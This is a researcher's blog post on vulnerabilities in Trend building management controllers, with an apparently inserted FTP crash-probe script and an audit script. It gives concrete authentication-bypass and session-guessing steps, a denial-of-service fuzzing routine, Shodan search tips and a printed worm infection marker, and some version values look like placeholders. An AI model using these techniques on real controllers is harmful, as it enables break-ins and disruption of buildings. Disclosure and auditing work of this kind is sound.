Blog: ICS & SCADA
Smart Building security. Is it any better 10 years on?
Way back in 2006, I was given a Trend IQ3 Building Management System (BMS) controller. My interest was piqued as these devices were being installed in Heathrow’s Terminal 5, according to the manufacturer’s press releases. The security of the device was a train wreck, yet ‘smart’ buildings are being managed with these devices more than ever.
They manage door access control, heating, ventilation and air conditioning (HVAC) and much more. Remember the Target breach in the US? The ingress point was believed to be the HVAC management system.
I’ve just taken delivery of a used 2013 model of the same controller and a brand new 2017 controller from the same vendor. So, has anything improved?
Here’s the rogues’ gallery: 2006, 2013 & 2017 at the bottom
I did try to disclose responsibly in 2006, but quickly hit a brick wall with the vendor. I presented the findings to GCHQ and the industry at the old CHECKCON conference and the issue also had some coverage in the press.
TL;DR? A short summary:
Little has improved. There is still a trivial authentication bypass allowing remote, unauthenticated compromise of smart building controllers, and hence of the buildings they manage, even on the latest models.
Worse, we’ve found these devices on the public internet. We found them in fire stations, military bases, schools, government buildings, businesses and large retailers among many.
We also found some that had already been partially compromised by malware.
Many of the worst problems are installer issues, though some point to the manufacturer.
The 2006 IQ3 Excite building management controller:
This one is running firmware version 126.96.36.199. Here’s what we found:
- Plaintext authentication
- Authentication bypass for embedded web server (see below)
- Reflected XSS on various parameters (reported again in 2013 by Darius Freamon, seven years after it was first found: CVE-2013-78004)
- Trivial session hijacking through incremental session IDs (e.g. http://192.168.0.244/modules.htm?param0=22, where the value simply increments with every request, so the next valid session is always one guess away)
- And a really fun memory leak into broadcast UDP packets: ‘test1’ was the password we set, and here we can see it leaking into packets broadcast on UDP/57612
Trivial fuzzing causes a DoS & possibly a buffer overflow:
When fuzzed over FTP, sending APPE with a 513-byte argument ($P is the fuzzer’s payload placeholder) crashes the FTP server.
But even more amusingly, the $P payload is then found being broadcast over the network from the controller, which is clearly operating in a very odd state.
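The length-stepping probe behind that APPE result, as an added example (not the author’s fuzzer and nothing from the vendor): it logs in, sends APPE with an ever longer argument, and reports the first length at which the server stops answering, then bisects between the last good and first bad length. The in-process toy FTP server that drops the connection at 513 bytes is constructed here so the script runs offline; the anonymous login and the verb responses are assumptions, not the controller’s real behaviour.

```python
import socket
import socketserver
import threading


def server_answers(host, port, appe_len, user=b"anonymous", password=b"x", timeout=3.0):
    """Log in, send APPE with an argument of appe_len bytes, then NOOP.
    Return True if the server still replies, False if the connection dies
    or times out (the crash indicator used here)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            rf = s.makefile("rb")
            rf.readline()                                   # 220 banner
            s.sendall(b"USER " + user + b"\r\n")
            rf.readline()                                   # 331
            s.sendall(b"PASS " + password + b"\r\n")
            rf.readline()                                   # 230 or 530; we only need an answer
            s.sendall(b"APPE " + b"A" * appe_len + b"\r\n")   # the $P payload of the write-up
            if not rf.readline():                           # EOF: server went away mid-command
                return False
            s.sendall(b"NOOP\r\n")
            return bool(rf.readline())
    except OSError:                                         # refused, reset or timed out
        return False


def find_crash_length(host, port, lo=1, hi=2048, step=128):
    """Coarse scan upwards, then bisect between the last good and the first
    bad length. Returns the smallest failing length found, or None."""
    last_ok, first_bad = None, None
    for n in range(lo, hi + 1, step):
        if server_answers(host, port, n):
            last_ok = n
        else:
            first_bad = n
            break
    if first_bad is None:
        return None
    if last_ok is None:
        return first_bad
    while first_bad - last_ok > 1:
        mid = (last_ok + first_bad) // 2
        if server_answers(host, port, mid):
            last_ok = mid
        else:
            first_bad = mid
    return first_bad


class ToyFtpHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in for the controller's FTP service: answers the
    few verbs the probe uses and 'crashes' (drops the connection without a
    reply) once the APPE argument reaches CRASH_AT bytes."""
    CRASH_AT = 513

    def handle(self):
        self.wfile.write(b"220 toy ftp\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
            verb = verb.upper()
            if verb == b"USER":
                self.wfile.write(b"331 password please\r\n")
            elif verb == b"PASS":
                self.wfile.write(b"230 logged in\r\n")
            elif verb == b"APPE":
                if len(arg) >= self.CRASH_AT:
                    return                                  # simulated crash
                self.wfile.write(b"425 no data connection\r\n")
            elif verb == b"NOOP":
                self.wfile.write(b"200 ok\r\n")
            elif verb == b"QUIT":
                self.wfile.write(b"221 bye\r\n")
                return
            else:
                self.wfile.write(b"502 not implemented\r\n")


def start_toy_server():
    """Start the toy server on an ephemeral loopback port and return it."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), ToyFtpHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_toy_server()
    host, port = srv.server_address
    print("first failing APPE length:", find_crash_length(host, port))  # 513 against the toy server
    srv.shutdown()
    srv.server_close()
```

Two caveats before pointing this at real kit. The toy server only drops one connection; a real controller’s FTP service stays dead, so every failed probe costs a reboot and the bisection is really one probe per reset. And since the outcome is a DoS of a live building controller, this belongs on a bench unit, never on a production network.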
There was more, but the point is made…
Manufacturer security advice
Trend Controls, the manufacturer, offers some reasonable advice for installers. They make the point that these devices should be on isolated subnets and NEVER exposed to the internet:
That’s fair, though I don’t think it’s any excuse for not offering even the most basic security. Authentication bypass, XSS and missing SSL? Really?
This advice also assumes that the threat is only from an attacker on the public internet. These controllers are found in quiet areas of buildings, hopefully in locked plant rooms and electrical panels. Ideal for the social engineer. Also, compromise the guy who manages the building, pop his PC and you can potentially unlock doors to order.
Have Trend made any efforts to audit their installers to ensure these devices AREN’T on the internet? It took me less than 10 seconds to find exposed controllers!
IQ3 Excite 2013 model, used
I bought this used from eBay. The firmware version was XXX, so much more recent.
IQ412 Excite, latest model, new and unused
www.shodanhq.com couldn’t be better suited to finding these controllers. Installers helpfully name the controllers right at the top of the embedded web server home page:
Search for IQ3 or IQ4; I got ~1,000 hits without trying hard. Check out some of these:
I have attempted to inform the organisations that I could identify from the headers, with varying responses.
Whilst the XSS could be useful, by far the most interesting security issue was a complete authentication bypass.
This is present if the ‘guest’ user has not been created. It’s weird behaviour, but if no guest account has been added, the user management pages are open to anyone who browses to them, with no login at all.
Looking at the web UI, click ‘modules’ in the top nav bar, then look at the options on the left-hand margin. If ‘users’ is present, you can add yourself a new user without ever authenticating.
And here’s the ‘create new user’ option:
Compromised controllers, serving malware?
Many of these controllers also have FTP enabled, often with simple, default or blank credentials. This is where it got a bit silly:
Whilst clicking through the web UI of a BMS controller, anti-virus popped up. I was starting to wonder if I was looking at a watering hole for security researchers!
However, poking around further, it appears that a number of these controllers have been compromised over FTP by a crypto-mining worm: Win32/Crytes.
We don’t think that the worm can actually execute on the controller, but it has successfully dropped an infection marker into the web page covering network config (modules | networks).
A simple GET request shows the following marker appended to the web page:
<iframe src=Photo.scr width=1 height=1 frameborder=0>
We found the same marker on multiple controllers on the internet. Whilst on this occasion the vendor/installer/clients have dodged a bullet, it would not be difficult to write malware that did successfully infect these controllers.
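An offline check for the two things described above, the ‘users’ option being reachable without logging in and the Photo.scr iframe marker, as an added example rather than anything from the original post or from Trend: it fetches /modules.htm with no credentials, looks for a ‘users’ link, then scans that page and every same-host page it links to (one level deep) for the marker. Only modules.htm appears in the write-up; the networks.htm and users.htm names in the constructed sample site are assumptions, and the sample HTML is made up so the script runs offline.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# The worm's calling card as found on the compromised controllers.
PHOTO_SCR_RE = re.compile(r"<iframe\b[^>]*\bsrc=['\"]?Photo\.scr\b", re.IGNORECASE)


class LinkCollector(HTMLParser):
    """Collect (href, link text) pairs from a page."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = [dict(attrs).get("href") or "", ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            href, text = self._current
            self.links.append((href, text.strip()))
            self._current = None


def collect_links(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser.links


def user_admin_reachable(modules_html):
    """True if the unauthenticated 'modules' page offers a 'users' option,
    i.e. the missing-guest-account quirk has left user management open."""
    return any(text.lower() == "users" for _, text in collect_links(modules_html))


def photo_scr_marker_present(html):
    return PHOTO_SCR_RE.search(html) is not None


def http_get(url, timeout=5.0):
    # Plain HTTP on purpose: these controllers offer no TLS.
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def audit_controller(base_url, fetch=http_get):
    """Fetch /modules.htm with no credentials, check for the 'users' option,
    then scan that page and every same-host page it links to for the marker."""
    base = base_url.rstrip("/")
    modules_url = base + "/modules.htm"
    modules_html = fetch(modules_url)
    pages = {modules_url: modules_html}
    for href, _ in collect_links(modules_html):
        url = urllib.parse.urljoin(modules_url, href)
        if not url.startswith(base + "/") or url in pages:
            continue
        try:
            pages[url] = fetch(url)
        except OSError:                 # urllib.error.URLError is an OSError
            continue
    return {
        "unauth_user_admin": user_admin_reachable(modules_html),
        "infection_marker_pages": [u for u, h in pages.items() if photo_scr_marker_present(h)],
    }


# Constructed sample site; networks.htm and users.htm are hypothetical paths.
SAMPLE_SITE = {
    "http://192.0.2.10/modules.htm": """<html><body><h1>Head Office BMS</h1>
<div id="nav"><a href="modules.htm?param0=22">modules</a></div>
<div id="left"><a href="networks.htm">networks</a> <a href="users.htm">users</a></div>
</body></html>""",
    "http://192.0.2.10/networks.htm": """<html><body><h2>Network</h2>
<table><tr><td>IP</td><td>192.0.2.10</td></tr></table>
<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe></body></html>""",
    "http://192.0.2.10/users.htm": '<html><body><a href="newuser.htm">create new user</a></body></html>',
}


def sample_fetch(url):
    """Offline stand-in for http_get, serving SAMPLE_SITE."""
    try:
        return SAMPLE_SITE[url]
    except KeyError:
        raise urllib.error.URLError("not in sample site")


if __name__ == "__main__":
    print(audit_controller("http://192.0.2.10", fetch=sample_fetch))
```

Against a real host call audit_controller("http://host") with no fetch argument. A True unauth_user_admin is the cue to confirm the ‘create new user’ option by hand; any marker hit means FTP has already been abused, so the FTP credentials should be treated as known to the worm and the controller’s pages checked for anything beyond the iframe.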